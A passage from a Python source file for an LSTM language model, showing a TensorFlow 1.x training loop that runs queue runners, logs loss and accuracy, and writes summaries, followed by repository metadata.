tf.summary.merge_all()\n\n\n def train(self, sess,summary_writer, init=True):\n\n\n start_time = time.time()\n #if init:\n # init_g = tf.global_variables_initializer()\n # init_l = tf.local_variables_initializer()\n # sess.run(init_g)\n # sess.run(init_l)\n # Start populating the filename queue.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for epoch in range(self.hparams.number_of_epochs):\n iteration = 0\n while iteration * self.hparams.batch_size < self.hparams.training_size:\n _, train_cost, train_accuracy , graph_summery, global_step= sess.run(\n [self.update, self.train_loss, self.accuracy, self.graph_summery,self.global_step])\n\n summary_writer.add_summary(graph_summery,global_step)\n iteration += 1\n if iteration % 10 == 0:\n print(\"iterations: [%2d] time: %4.4f, loss: %.8f, accuracy: %.8f\" \\\n % (iteration, time.time() - start_time, np.mean(train_cost), train_accuracy))\n\n # if iteration % 1000 == 0:\n # self.save(global_step=self.global_step)\n\n coord.request_stop()\n 
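        # request_stop() only signals the queue-runner threads to finish;
        # join() below blocks until they have actually exited, so the input
        # pipeline shuts down cleanly before train() returns.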
coord.join(threads)\n\n\n\n","repo_name":"samiraabnar/ContextualWordEmbeddings","sub_path":"src/LSTMLanguageModel.py","file_name":"LSTMLanguageModel.py","file_ext":"py","file_size_in_byte":12166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}